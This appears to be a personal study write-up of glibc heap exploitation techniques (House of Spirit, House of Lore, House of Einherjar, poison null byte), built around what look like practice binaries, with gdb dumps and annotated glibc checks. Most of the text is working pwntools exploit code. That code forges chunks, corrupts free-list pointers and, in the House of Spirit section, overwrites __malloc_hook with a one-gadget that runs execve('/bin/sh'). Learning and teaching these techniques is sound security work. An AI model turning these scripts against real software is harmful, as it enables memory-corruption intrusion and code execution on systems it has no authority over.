[On-Going] Fine, I'll Learn More Heap Exploitation

2025-01-02

Table of Contents

  1. House of Spirit
  2. House of Lore
  3. House of Einherjar
  4. Google Poison Null Byte
  5. House of Rabbit

House of Spirit (libc < 2.30)

This exploit revolves around corrupting a pointer that is eventually passed to free, so that a fake chunk we control is linked into a fastbin and later handed back by malloc, giving us a write where we want it. Below is the analysis and step-by-step breakdown.
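
At a high level the attack looks like this (a hedged outline, not this program's exact code):

# 1. Plant a fastbin-sized fake size field just before data we control.
# 2. Corrupt a pointer the program will later free() so it points at fake + 0x10.
# 3. free() links the fake chunk into the matching fastbin.
# 4. A later malloc() of that size returns the fake chunk, and writing into it
#    clobbers whatever really lives behind the fake size field.
fake_size = 0x81   # PREV_INUSE set, no IS_MMAPPED/NON_MAIN_ARENA, 0x10-aligned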

pwndbg> vis

0x603000        0x0000000000000000      0x0000000000000021      ........!.......
0x603010        0x5a5a5a5a5a5a5a5a      0x5a5a5a5a5a5a5a5a      ZZZZZZZZZZZZZZZZ
0x603020        0x0a5a5a5a5a5a5a5a      0x0000000000020fe1      ZZZZZZZ......... <-- Top chunk
pwndbg> f 2
#2  0x000000000040096b in main (argc=1, argv=0x7fffffffdd78) at pwnable_house_of_spirit.c:65
pwndbg> ptype m_array
type = struct chunk {
    char name[8];
    char *ptr;
} [8]

Pointer setup:

pwndbg> p m_array
$1 = {{
    name = "AAAA\n\000\000",
    ptr = 0x603010 'Z' <repeats 23 times>, "\n\341\017\002"
  }, {
    name = "\000\000\000\000\000\000\000",
    ptr = 0x0

Target structure for arbitrary write:

pwndbg> ptype user
type = struct user {
    unsigned long unused_0;
    unsigned long age;
    char unused_1[64];
    char target[16];
    char unused_2[16];
    char username[64];
}

The stack overflow lets us overwrite the ptr field in m_array[0] through the adjacent 8-byte name field; that pointer is later passed to free.

pwndbg> p m_array[0]
$1 = {
  name = "VVVVVVVV",
  ptr = 0x5656565656565656 <error: Cannot access memory at address 0x5656565656565656>
}
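
A minimal sketch of that overflowing input with pwntools (the target address here is purely illustrative):

from pwn import p64

# name[8] is filled completely, so the next 8 bytes land on the adjacent
# ptr field of m_array[0].
target  = 0x602010                   # hypothetical address we want free() to act on
payload = b"V" * 8 + p64(target)     # name ........ | ptr = target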

Potential issues with the size flags:

0x6f = IS_MMAPPED is the problem
> malloc_chunk &user
PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6f)


0x6d = NON_MAIN_ARENA is the problem.
> malloc_chunk &user
PREV_INUSE | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6d)

0x69 = fails aligned_OK
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

0x61 = fails the next-chunk size sanity check (the next size must lie between 2*SIZE_SZ and av->system_mem),
as the next chunk's size field is 0
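
One way to reason about candidate size values is to model the free() checks above (a hedged sketch; the constants and helper are mine, not glibc code):

PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 0x1, 0x2, 0x4

def fake_size_ok(size, next_size, system_mem=0x21000):
    if size & (IS_MMAPPED | NON_MAIN_ARENA):
        return False                            # wrong free() path / bogus arena lookup
    chunksize = size & ~0x7                     # strip the three flag bits
    if chunksize < 0x20 or chunksize % 0x10:    # MINSIZE and aligned_OK on x86-64
        return False
    if not (0x10 < next_size < system_mem):     # "free(): invalid next size (fast)"
        return False
    return True

assert not fake_size_ok(0x6f, 0x20fff)   # IS_MMAPPED set
assert not fake_size_ok(0x6d, 0x20fff)   # NON_MAIN_ARENA set
assert not fake_size_ok(0x69, 0x20fff)   # fails aligned_OK
assert not fake_size_ok(0x61, 0x0)       # next chunk size is 0
assert fake_size_ok(0x81, 0x20fff)       # the layout used below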

The final fake chunk setup:

> dq &user 22
0000000000602010   A[0000000000000000 0000000000000081 <- Fake size field (set via the age field)
0000000000602020     0000000000000000 0000000000000000
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0000000000000000 0000000000000000
0000000000602050     0000000000000000 0000000000000000
0000000000602060     0058585858585858 0000000000000000
0000000000602070     0000000000000000 0000000000000000
0000000000602080     0000000000000000 0000000000000000
0000000000602090     0000000000000000]0000000000020fff <- Next chunk size field.
00000000006020a0     0000000000000000 0000000000000000
00000000006020b0     0000000000000000 0000000000000000

> fastbins
0x80: 0x602010 (user) ◂— 0

# Set the "age" field.
age = 0x81
io.sendafter(b"age: ", f"{age}".encode())

# Set the "username" field.
username = p64(0) * 3 + p64(0x20fff)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)

free(chunk_A)

chunk_B = malloc(0x78, b"Z" * 64 + b"Pwned!!", b"B")


io.interactive()

Unsorted bin Perspective

# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())

# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)

free(chunk_A)

chunk_B = malloc(0x88, b"Z" * 64 + b"Pwned!!", b"B")


io.interactive()

pwndbg> dq &user 22
0000000000602010     0000000000000000 0000000000000091
0000000000602020     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602030     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602040     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602050     5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602060     00212164656e7750 0000000000000000
0000000000602070     0000000000000000 0000000000000000
0000000000602080     0000000000000000 0000000000000000
0000000000602090     0000000000000000 0000000000000000
00000000006020a0     0000000000000090 0000000000000011
00000000006020b0     0000000000000000 0000000000000001

Code Execution

Constraints:

  1. Fastbin Size Range: Ensure target size fits within fastbin range.
  2. Flag Management: Avoid IS_MMAPPED or NON_MAIN_ARENA in the size field.
  3. Alignment: Ensure 16-byte alignment.
  4. Valid Metadata: Maintain valid succeeding size fields to bypass checks.

What we need to bypass:

if (__builtin_expect (contiguous (av)
    && (char *) nextchunk
    >= ((char *) av->top + chunksize(av->top)), 0))
    malloc_printerr ("double free or corruption (out)");

Use a double free (fastbin dup)

# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())

# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Fill it with data and name it.

chunk_A = malloc(0x68, b"A" * 0x08, b"A" * 0x08)
chunk_B = malloc(0x68, b"B" * 0x08, b"B" * 0x08)
chunk_C = malloc(0x18, b"Y" * 0x18, b"C" * 0x08 + p64(heap + 0x10))

free(chunk_A)
free(chunk_B)
free(chunk_C)

malicious = malloc(0x68, p64(libc.sym.__malloc_hook - 35), b"C" * 8)
chunk_D = malloc(0x68, b"D" * 0x08, b"A" * 0x08)
chunk_E = malloc(0x68, b"E" * 0x08, b"B" * 0x08)

'''
0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv
'''
chunk_user = malloc(0x68, b"X" * 0x13 + p64(libc.address + 0xe1fa1), b"F" * 8)

malloc(1, b"", b"")

io.interactive()

Takeaways

  1. Power and control: the exploit requires precise control over the pointer passed to free.
  2. Size field validity: the size field must avoid flags like IS_MMAPPED and NON_MAIN_ARENA.
  3. Double-free strategy: leveraging fastbin dup for the arbitrary write is critical to achieving exploitation.

House of Lore (libc < 2.28)

This write-up explores a Use-After-Free (UAF) vulnerability leading to exploitation via the unsorted bin. Specifically, we demonstrate how to craft a write primitive by leveraging the unsorted bin’s bk pointer.

  1. Read-after-free
  2. Write-after-free <- the flaw used here (sketched below)
  3. Call-after-free
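
A hedged illustration of the write-after-free primitive this section relies on (malloc/free/edit are the assumed wrappers around the target's menu, as in the scripts below):

chunk = malloc(0x88)            # a non-fastbin sized chunk
free(chunk)                     # it lands in the unsorted bin; its first 16 user
                                # bytes now hold the fd and bk pointers
edit(chunk, p64(0) + p64(0xdeadbeef))   # the bug: we can still write to it,
                                        # so fd/bk are under our control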

Unsortedbin Variant

Consider the following heap layout. We have control over metadata of a freed chunk:

0x603000        0x0000000000000000      0x0000000000000091      ................  <-- unsortedbin[all][0]
0x603010        0x5959595959595959      0x5a5a5a5a5a5a5a5a      YYYYYYYYZZZZZZZZ
0x603020        0x000000000000000a      0x0000000000000000      ................
0x603030        0x0000000000000000      0x0000000000000000      ................
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................
0x603070        0x0000000000000000      0x0000000000000000      ................
0x603080        0x0000000000000000      0x0000000000000000      ................
0x603090        0x0000000000000090      0x0000000000000090      ................
0x6030a0        0x0000000000000000      0x0000000000020f61      ........a.......
0x6030b0        0x0000000000000000      0x0000000000000000      ................
0x6030c0        0x0000000000000000      0x0000000000000000      ................
0x6030d0        0x0000000000000000      0x0000000000000000      ................
0x6030e0        0x0000000000000000      0x0000000000000000      ................
0x6030f0        0x0000000000000000      0x0000000000000000      ................
0x603100        0x0000000000000000      0x0000000000000000      ................
0x603110        0x0000000000000000      0x0000000000000000      ................
0x603120        0x0000000000000000      0x0000000000020ee1      ................  <-- Top chunk

Using the write-after-free vulnerability, we overwrite the bk pointer of a chunk in the unsorted bin to point to a controlled location:

0x24918000      0x0000000000000000      0x00000000000000a1      ................  <-- unsortedbin[all][0]
0x24918010      0x0000000000000000      0x0000000000602010      ......... `.....
0x24918020      0x0000000000000000      0x0000000000000000      ................
0x24918030      0x0000000000000000      0x0000000000000000      ................

Now that we have exploited the “write-after-free”, malloc will search the unsorted bin from back to front and conduct a partial unlink.

Before malloc:

pwndbg> unsortedbin 
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x24918000 —▸ 0x602010 (user) ◂— 0

When malloc allocates the chunk, it processes the unsorted bin using the partial unlink process. The corrupted bk pointer is used to adjust heap structures.
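
A minimal model of that partial unlink (my own pseudocode, not glibc source; fd/bk live at +0x10/+0x18 from the chunk header on x86-64):

def partial_unlink(mem, unsorted_head, victim):
    bck = mem[victim + 0x18]          # bck = victim->bk (the pointer we corrupted)
    mem[unsorted_head + 0x18] = bck   # unsorted_chunks(av)->bk = bck
    mem[bck + 0x10] = unsorted_head   # bck->fd = unsorted_chunks(av)  <-- the write we get

# victim->bk was redirected to our fake chunk at &user (0x602010).
mem = {0x24918000 + 0x18: 0x602010}
partial_unlink(mem, unsorted_head=0x7ffff7b97b58, victim=0x24918000)
assert mem[0x602010 + 0x10] == 0x7ffff7b97b58    # a main_arena pointer lands at user+0x10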

After malloc:

pwndbg> unsortedbin 
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x602010 (user) ◂— 0

The bk pointer now points to the target memory location we want to write to, which is now accessible for writing:

0000000000602010     00006567726f6547 0000000000000000  <-- overflow "username", then need valid size field.
0000000000602020     00007f96be597b58 0000000000000000  <-- main arena fd
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0058585858585858 0000000000000000  <-- Target 
0000000000602050     0000000000000000 0000000000000000

The unsorted bin now looks like:

unsortedbin

all [corrupted]
FD: 0x25ecb000 ◂— 0
BK: 0x602010 (user) —▸ 0x602000 (data_start) ◂— 0xe1

Final script for the write primitive:

'''
0xe1 = size field
p64(0) = fake `fd` that will be overwritten
p64(elf.sym.user - 16) = bk that avoids triggering exploit mitigations during the partial unlink.
'''
username = p64(0) + p64(0xe1) + p64(0) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)

# Free the first chunk into the unsortedbin.
free(chunk_A)

# Overwrite the bk of the free'd chunk.
edit(chunk_A, p64(0) + p64(elf.sym.user))

# Will cause the partial unlink AND then search the unsorted bin 
# triggering the exploit
unsorted_bin_attack = malloc(0xd8)

# Overwrite our .data
edit(unsorted_bin_attack, p64(0)*4 + b"Pwned!\0")

Interesting Notes:

  1. Alignment Flexibility: Fake chunks can be misaligned, unlike fast bins.
  2. Flags: You can use invalid flags in the size field without causing immediate crashes.
  3. Recursive Exploitation: Pointing bk to another fake chunk or the chunk itself allows for multiple free operations.

Takeaways

Size sanity checks matter for this attack, and the fake chunk's bk must point to writable memory.

Smallbins Variant

New concepts being introduced:

  • Doubly linked list
  • Circular
  • Sizes 0x20 - 0x3f0 (overlapping the fastbin range)
  • First in, first out

This is a small variation on the unsorted bin attack, but with an extra constraint: when our fake chunk is allocated, the victim's bk is followed and malloc checks that the fake chunk's fd points back to the victim. This is one half of the safe unlinking check, so you need a heap leak to exploit it fully. In this case we have one, and the script is updated accordingly.
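
A minimal model of that check (my own pseudocode, offsets as before):

def smallbin_take(mem, bin_head, victim):
    bck = mem[victim + 0x18]          # follow victim->bk to our fake chunk
    if mem[bck + 0x10] != victim:     # the half of safe unlinking we have to satisfy
        raise RuntimeError("malloc(): smallbin double linked list corrupted")
    mem[bin_head + 0x18] = bck        # bin->bk = bck
    mem[bck + 0x10] = bin_head        # bck->fd = bin; the next allocation returns bck

The fake chunk's fd therefore has to hold the victim's heap address, which is why the heap leak is needed.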

# Populate the "username" field.
username = p64(elf.sym.user) + p64(0xdeadbeef) + p64(heap) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)

# Edit the first chunk.
edit(chunk_A, b"Y"*8)

# Free the first chunk into the unsortedbin.
free(chunk_A)
malloc(0xa8)

# Overwrite the bk of the free'd chunk.
edit(chunk_A, p64(0) + p64(elf.sym.user))

# First allocation returns chunk_A from the tail of the smallbin.
small_bin_attack = malloc(0x98)

# Allocate our fake chunk.
small_bin_attack = malloc(0x98)

edit(small_bin_attack, p64(0)*4 + b"Pwned!\0")

Visualized heap:

pwndbg> vis
0x2010f000      0x0000000000000000      0x00000000000000a1      ................  <-- smallbins[0xa0][0]
0x2010f010      0x0000000000000000      0x0000000000602010      ......... `.....
0x2010f020      0x0000000000000000      0x0000000000000000      ................
[ ... ]
0x2010f120      0x0000000000000000      0x0000000000000000      ................
0x2010f130      0x0000000000000000      0x00000000000000b1      ................
0x2010f140      0x0000000000000000      0x0000000000000000      ................
[ ... ]
0x2010f1d0      0x0000000000000000      0x0000000000000000      ................
0x2010f1e0      0x0000000000000000      0x0000000000020e21      ........!.......  <-- Top chunk

pwndbg> dq &user
0000000000602010     0000000000602010 00000000deadbeef
0000000000602020     000000002010f000 0000000000602000
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0058585858585858 0000000000000000

Takeaways

We point the victim's bk at a fake chunk we prepared; malloc allocates from the tail of the smallbin, and because our fake fd points back at the victim it survives the partial unlink check, so the fake chunk gets allocated. There is no size field integrity check and misaligned chunks can be used, but a heap leak is required.

Largebins Variant

  • Structure: Doubly linked, circular.
  • Size Range: 0x400 and above.
    • Holds a range of sizes:
      • 0x400 => 0x410, 0x420, 0x430
      • 0x440 => 0x450, 0x460, 0x470
    • No real maximum: the last bin holds everything from about 0x80000 upward (no upper limit).


Uses a skip list:

  • Chunks are sorted in descending size order.
  • The first chunk of each size points to the next size, skipping over chunks of the same size.
  • If a size has only one chunk, it automatically becomes the skip chunk.
  • Newly freed chunks are added to the head of the skip chunks.
  • Head skip chunks are allocated last.

Which list should we target? Either works; here we use a normal fd attack on the large bin.

Allocation flow in malloc:

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted.  */
if (victim != last (bin)
    && chunksize_nomask (victim)
      == chunksize_nomask (victim->fd))
        victim = victim->fd;

  remainder_size = size - nb;
  unlink (av, victim, bck, fwd);
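
Modelled in pseudocode (not glibc source), the part we care about is that victim->fd is followed whenever two chunks share a size, and that is the pointer we corrupt:

def largebin_pick(mem, bin_head, victim):
    last = mem[bin_head + 0x18]                               # last(bin) == bin->bk
    fd   = mem[victim + 0x10]
    if victim != last and mem[victim + 0x8] == mem[fd + 0x8]: # chunksize_nomask compare
        victim = fd      # the skip chunk is preserved; our fake chunk is picked instead
    return victim

So corrupting chunk_A's fd to point at a fake chunk whose size field matches (0x401 below) is enough.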

Our fake chunk setup:

dq &user
0000000000602010     0000000000000000 0000000000000401
0000000000602020     0000000000602010 0000000000602010
0000000000602030     0000000000000000 0000000000000000
0000000000602040     0058585858585858 0000000000000000

Final exploit:

username = p64(0) + p64(0x401) + p64(elf.sym.user) + p64(elf.sym.user)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")

# Request 2 large chunks.
chunk_A = malloc(0x3f8)
malloc(0x88)
chunk_B = malloc(0x3f8)
malloc(0x88)

# Free both chunks into the unsortedbin.
free(chunk_A)
free(chunk_B)

# right now they are in unsorted
# trigger unsorted bin search
malloc(0x408)
# Overwrite the fd of the free'd chunk.

edit(chunk_A, p64(elf.sym.user))

chunk_C = malloc(0x3f8)

edit(chunk_C, p64(0)*4 + b"Pwned!\0")

io.interactive()

Takeaways

  1. An accurate size field is crucial.
  2. The fd_nextsize/bk_nextsize pointers must also be accounted for (here they are left NULL so the unlink skips them).

Overall

The House of Lore is mostly used to allocate fake chunks that overlap sensitive data.

House of Einherjar (libc < 2.28)

0x603000        0x0000000000000000      0x0000000000000091      ................  <-- unsortedbin[all][0]
0x603010        0x00007ffff7bafc80      0x00007ffff7bafc80      ................
0x603020        0x0000000000000000      0x0000000000000000      ................
0x603030        0x0000000000000000      0x0000000000000000      ................
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................

ptype user
type = struct user {
    char username[32];
    char target[16];
}

pwndbg> dq &user
0000000000602010     4141414141414141 0a41414141414141
0000000000602020     0000000000000000 0000000000000000
0000000000602030     0058585858585858 0000000000000000
0000000000602040     0000000000000000 0000000000000000

The bug: Single byte overflow

pwndbg> vis
0x603000        0x0000000000000000      0x0000000000000091      ................
0x603010        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603020        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603030        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603040        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603050        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603060        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603070        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603080        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603090        0x0a41414141414141      0x0000000000020f00      AAAAAAA.........  <-- Top chunk

Targeting the top chunk alone may not yield significant results. However, overflowing into an adjacent allocated or free chunk can. We should target a larger, non-fastbin chunk.

0x603000        0x0000000000000000      0x0000000000000101      ................
0x603010        0x0000000000000000      0x0000000000000000      ................
0x603020        0x0000000000000000      0x0000000000000000      ................

As we can see, the overflow clears the PREV_INUSE flag of an allocated chunk. We then simply have to pass the safe unlinking checks to allocate our fake chunk over our target. What this looks like:

0xb3ed000       0x0000000000000000      0x0000000000000091      ................
0xb3ed010       0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
[ ... ]
0xb3ed080       0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
0xb3ed090       0x00000000deadbeef      0x0000000000000100      ................
0xb3ed0a0       0x0000000000000000      0x0000000000000000      ................
[ ... ]
0xb3ed190       0x0000000000000000      0x0000000000020e71      ........q.......  <-- Top chunk

We go after the unlinking process by creating a fake chunk:

# Populate the username field.
username = p64(0) + p64(0x31) + p64(elf.sym.user) + p64(elf.sym.user)
io.sendafter(b"username: ", username)

# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")

# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)

# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))

When freeing chunk B, malloc attempts to consolidate backward because the PREV_INUSE flag is cleared. It reads the PREV_SIZE field (0x0000000000001080) and subtracts this value from the chunk’s address (0x603090), resulting in 0x602010. This calculation points directly to the fake chunk we prepared in the data section.
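
The arithmetic, using the addresses from the dumps (a small sanity check rather than exploit code):

chunk_B   = 0x603090                 # header of the chunk being freed
user      = 0x602010                 # &user in .data, where the fake chunk lives
prev_size = chunk_B - user           # 0x1080, the value planted in B's prev_size field
assert chunk_B - prev_size == user   # free() now treats &user as the "previous" chunk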

vis

0x603000        0x0000000000000000      0x0000000000000091      ................
0x603010        0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
[ ... ]
0x603080        0x5858585858585858      0x5858585858585858      XXXXXXXXXXXXXXXX
0x603090        0x0000000000001080      0x0000000000000100      ................
0x6030a0        0x0000000000000000      0x0000000000000000      ................
[ ... ]
0x603190        0x0000000000000000      0x0000000000020e71      ........q.......         <-- Top chunk

pwndbg> vis 0x0000000000602010 
0x602010        0x0000000000000000      0x0000000000000031      ........1.......
0x602020        0x0000000000602010      0x0000000000602010      . `...... `.....
0x602030        0x0058585858585858      0x0000000000000000      XXXXXXX.........

Don’t forget about the "corrupted size vs. prev_size" mitigation:

  /* Take a chunk off a bin list */
  #define unlink(AV, P, BK, FD) {
      if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
        malloc_printerr ("corrupted size vs. prev_size");
      FD = P->fd;
      BK = P->bk;
      if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
        malloc_printerr ("corrupted double-linked list");
      else {

When malloc reaches our chunk, it reads the size field and uses it to calculate the address of the next chunk. In a normal scenario this address would lead back to the victim chunk, since malloc had previously subtracted the prev_size field to reach the current chunk.

However, in this case the process goes 0x30 bytes forward (the fake chunk's size) and reads a prev_size that does not match, which triggers the exploit mitigation. The vulnerability lies in our ability to control the size field: by setting it to 8, next_chunk points back into the fake chunk itself, so the check compares the size field against itself and passes. The root cause is that the check does not compare against the size field of the victim chunk, but against the size field it read from our fake chunk.
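
A small model of why a size of 8 passes the check above (my own sketch, not glibc source):

mem = {}
p = 0x602010                 # our fake chunk (&user)
mem[p + 0x8] = 0x8           # the crafted size field

size       = mem[p + 0x8] & ~0x7   # chunksize(P) = 8
next_chunk = p + size              # = p + 8: points back into the fake chunk itself
assert mem[next_chunk] == size     # prev_size(next_chunk(P)) reads the size field we wrote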

This leads to the final exploit, which allows for a write primitive.


# Populate the username field.
username = p64(0) + p64(0x8) + p64(elf.sym.user) + p64(elf.sym.user)
io.sendafter(b"username: ", username)

# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")

# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)

# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))

free(chunk_B)
a = malloc(0x88)
edit(a, p64(0) *2 + b"Pwned!\0")

Takeaways

  1. Clear the PREV_INUSE flag to allow backward consolidation.
  2. Provide a bogus prev_size value that points from the victim chunk to the fake chunk elsewhere in memory.
  3. Free a chunk to trigger backward consolidation.
    • During this process, the allocator consolidates the free chunk with the fake chunk and bypasses safe unlinking checks.
  4. Ensure the fd and bk pointers in the fake chunk point back to itself to survive unlinking.
  5. Bypass the size vs. prev_size check (introduced as mitigation in version 2.26 and updated in 2.29) by crafting the fake chunk’s size field to always pass validation.
  6. Make an additional malloc call to overwrite the target data section, achieving the desired write primitive.

Google Poison Null Byte Technique

Creating overlapping heap chunks.

  • Target a free chunk's size field

vis

0x603000        0x0000000000000000   A[ 0x0000000000000021      ........!.......
0x603010        0x0000000000000000      0x0000000000000000      ................
0x603020        0x0000000000000000 ] B[ 0x0000000000000211      ................         <-- unsortedbin[all][0]
0x603030        0x00007ffff7b97b58      0x00007ffff7b97b58      X{......X{......
[ ... ]
0x603230        0x0000000000000210 ] C[ 0x0000000000000090      ................
[ ... ]
0x6032c0        0x0000000000000000 ]    0x0000000000000021      ........!.......
0x6032d0        0x0000000000000000      0x0000000000000000      ................
0x6032e0        0x0000000000000000      0x0000000000020d21      ........!.......         <-- Top chunk

Overflow successful!

vis

0x603000        0x0000000000000000      0x0000000000000021      ........!.......
0x603010        0x4141414141414141      0x4141414141414141      AAAAAAAAAAAAAAAA
0x603020        0x4141414141414141      0x0000000000000200      AAAAAAAA........         <-- unsortedbin[all][0] !!
0x603030        0x00007ffff7b97b58      0x00007ffff7b97b58      X{......X{......
0x603040        0x0000000000000000      0x0000000000000000      ................
0x603050        0x0000000000000000      0x0000000000000000      ................
0x603060        0x0000000000000000      0x0000000000000000      ................
0x603070        0x0000000000000000      0x0000000000000000      ................

The remaindering process executed with the wrong size because we overwrote chunk B's size field: the remainder's foot is written 0x10 bytes short of chunk C, so C's prev_size at 0x603230 still holds the stale value 0x210.

dq 0x603220
0000000000603220     0000000000000100 0000000000000000
0000000000603230     0000000000000210 0000000000000090
0000000000603240     0000000000000000 0000000000000000
0000000000603250     0000000000000000 0000000000000000
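
The stale bookkeeping in numbers (addresses from the dumps above; a sanity check, not exploit code):

B         = 0x603020       # header of the overflowed chunk, original size 0x211
fake_size = 0x200          # size after the single NULL byte overflow
C         = B + 0x210      # 0x603230, chunk C's prev_size field

# The post-overflow remaindering writes its foot at B + fake_size (0x603220),
# 0x10 bytes short of C, so C's prev_size keeps the stale value 0x210.
stale_prev_size = 0x210
assert C - stale_prev_size == B    # freeing chunk_C later consolidates back to B,
                                   # overlapping the chunks carved out of B in between

The script that produces this layout: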
# Request 2 chunks.
chunk_A = malloc(0x18)
chunk_B = malloc(0x208)
chunk_C = malloc(0x88)
malloc(0x18)  # Guard rail

free(chunk_B)

edit(chunk_A, b"A"*0x18 + p8(0))

chunk_b1 = malloc(0xf8)
chunk_b2 = malloc(0xf8)

free(chunk_b1)
free(chunk_C)

Takeaways

No leaks are needed for this technique.

House of Rabbit